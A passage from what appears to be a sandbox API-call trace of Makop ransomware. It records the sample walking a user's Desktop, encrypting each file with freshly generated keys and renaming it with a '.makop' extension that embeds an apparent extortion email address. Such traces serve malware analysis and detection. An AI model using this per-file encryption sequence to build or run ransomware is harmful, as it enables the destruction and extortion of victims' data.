dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.666] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.666] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.666] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.666] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.666] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.666] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.666] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.666] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.666] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.666] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.667] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xb5df, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xb5df, lpOverlapped=0x0) returned 1 [0127.667] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xb5e0, dwBufLen=0xb5e0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xb5e0) returned 1 [0127.667] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.667] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xb5e0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xb5e0, lpOverlapped=0x0) returned 1 [0127.668] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.668] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xb6c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.668] SetEndOfFile (hFile=0xac) returned 1 [0127.670] GetProcessHeap () returned 0x550000 [0127.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.670] GetProcessHeap () returned 0x550000 [0127.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.670] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQBScsTrcR2uGzhoPg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqbscstrcr2ugzhopg.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQBScsTrcR2uGzhoPg.xlsx.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqbscstrcr2ugzhopg.xlsx.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.676] CloseHandle (hObject=0xac) returned 1 [0127.676] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0127.677] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58daa100, ftCreationTime.dwHighDateTime=0x1d5e6e5, ftLastAccessTime.dwLowDateTime=0x50a8d840, ftLastAccessTime.dwHighDateTime=0x1d5de6a, ftLastWriteTime.dwLowDateTime=0x50a8d840, ftLastWriteTime.dwHighDateTime=0x1d5de6a, nFileSizeHigh=0x0, nFileSizeLow=0x4817, dwReserved0=0x0, dwReserved1=0xffff, cFileName="fAZ2KzgLfwk_JUn0Xw.mp4", cAlternateFileName="FAZ2KZ~1.MP4")) returned 1 [0127.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fAZ2KzgLfwk_JUn0Xw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faz2kzglfwk_jun0xw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.677] GetProcessHeap () returned 0x550000 [0127.677] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.677] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.677] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.677] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x9, lpOverlapped=0x0) returned 1 [0127.678] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.678] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.678] GetProcessHeap () returned 0x550000 [0127.678] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.678] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.678] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.678] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.678] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.678] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.678] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.679] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.679] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.679] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.679] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.679] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.679] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x4817, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x4817, lpOverlapped=0x0) returned 1 [0127.679] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x4820, dwBufLen=0x4820 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x4820) returned 1 [0127.679] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.679] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x4820, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x4820, lpOverlapped=0x0) returned 1 [0127.679] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.680] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x4904, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.680] SetEndOfFile (hFile=0xac) returned 1 [0127.685] GetProcessHeap () returned 0x550000 [0127.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.685] GetProcessHeap () returned 0x550000 [0127.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.685] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fAZ2KzgLfwk_JUn0Xw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faz2kzglfwk_jun0xw.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fAZ2KzgLfwk_JUn0Xw.mp4.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faz2kzglfwk_jun0xw.mp4.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.688] CloseHandle (hObject=0xac) returned 1 [0127.688] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb272b0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0x2388ad20, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0x2388ad20, ftLastWriteTime.dwHighDateTime=0x1d5d9b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="HLRDqhTz34MvUQb", cAlternateFileName="HLRDQH~1")) returned 1 [0127.688] GetProcessHeap () returned 0x550000 [0127.688] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x7c) returned 0x56a200 [0127.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb272b0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0x2388ad20, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0x2388ad20, ftLastWriteTime.dwHighDateTime=0x1d5d9b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName=".", cAlternateFileName="")) returned 0x56c880 [0127.689] GetProcessHeap () returned 0x550000 [0127.689] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56a200 | out: hHeap=0x550000) returned 1 [0127.689] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb272b0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0x2388ad20, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0x2388ad20, ftLastWriteTime.dwHighDateTime=0x1d5d9b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="..", cAlternateFileName="")) returned 1 [0127.689] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb680c0, ftCreationTime.dwHighDateTime=0x1d5e01a, ftLastAccessTime.dwLowDateTime=0xf499b4b0, ftLastAccessTime.dwHighDateTime=0x1d5de33, ftLastWriteTime.dwLowDateTime=0xf499b4b0, ftLastWriteTime.dwHighDateTime=0x1d5de33, nFileSizeHigh=0x0, nFileSizeLow=0xad23, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="-PZy7FUFYSElU0dwMRIz.m4a", cAlternateFileName="-PZY7F~1.M4A")) returned 1 [0127.689] GetProcessHeap () returned 0x550000 [0127.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x27e) returned 0x591d80 [0127.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\-PZy7FUFYSElU0dwMRIz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\-pzy7fufyselu0dwmriz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.689] GetProcessHeap () returned 0x550000 [0127.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.689] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.689] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.689] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0xd, lpOverlapped=0x0) returned 1 [0127.690] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.690] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.690] GetProcessHeap () returned 0x550000 [0127.690] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.690] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245f9f0*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245f9f0*=0x50) returned 1 [0127.690] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.690] WriteFile (in: hFile=0xa4, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fa08*=0x50, lpOverlapped=0x0) returned 1 [0127.690] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.691] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.691] WriteFile (in: hFile=0xa4, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.691] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.691] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.691] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.691] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.691] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.691] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0xad23, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0xad23, lpOverlapped=0x0) returned 1 [0127.691] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0xad30, dwBufLen=0xad30 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0xad30) returned 1 [0127.692] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.692] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xad30, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0xad30, lpOverlapped=0x0) returned 1 [0127.692] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.692] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xae14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.692] SetEndOfFile (hFile=0xa4) returned 1 [0127.695] GetProcessHeap () returned 0x550000 [0127.695] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.695] GetProcessHeap () returned 0x550000 [0127.695] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.695] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\-PZy7FUFYSElU0dwMRIz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\-pzy7fufyselu0dwmriz.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\-PZy7FUFYSElU0dwMRIz.m4a.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\-pzy7fufyselu0dwmriz.m4a.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.696] CloseHandle (hObject=0xa4) returned 1 [0127.700] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc45c540, ftCreationTime.dwHighDateTime=0x1d5dfc8, ftLastAccessTime.dwLowDateTime=0x58b545c0, ftLastAccessTime.dwHighDateTime=0x1d5e363, ftLastWriteTime.dwLowDateTime=0x58b545c0, ftLastWriteTime.dwHighDateTime=0x1d5e363, nFileSizeHigh=0x0, nFileSizeLow=0xec92, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="6Fr-U7e.mp4", cAlternateFileName="")) returned 1 [0127.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\6Fr-U7e.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\6fr-u7e.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.700] GetProcessHeap () returned 0x550000 [0127.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.700] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.701] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.701] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0xe, lpOverlapped=0x0) returned 1 [0127.702] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.702] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.702] GetProcessHeap () returned 0x550000 [0127.702] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.702] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40) returned 1 [0127.702] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.702] WriteFile (in: hFile=0xa4, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fa08*=0x40, lpOverlapped=0x0) returned 1 [0127.702] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.702] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.702] WriteFile (in: hFile=0xa4, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.702] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.702] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.702] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.702] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.702] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.702] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0xec92, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0xec92, lpOverlapped=0x0) returned 1 [0127.703] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0xeca0, dwBufLen=0xeca0 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0xeca0) returned 1 [0127.703] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.704] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xeca0, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0xeca0, lpOverlapped=0x0) returned 1 [0127.704] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.704] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xed74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.704] SetEndOfFile (hFile=0xa4) returned 1 [0127.706] GetProcessHeap () returned 0x550000 [0127.706] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.707] GetProcessHeap () returned 0x550000 [0127.707] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.707] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\6Fr-U7e.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\6fr-u7e.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\6Fr-U7e.mp4.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\6fr-u7e.mp4.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.708] CloseHandle (hObject=0xa4) returned 1 [0127.708] FindNextFileW 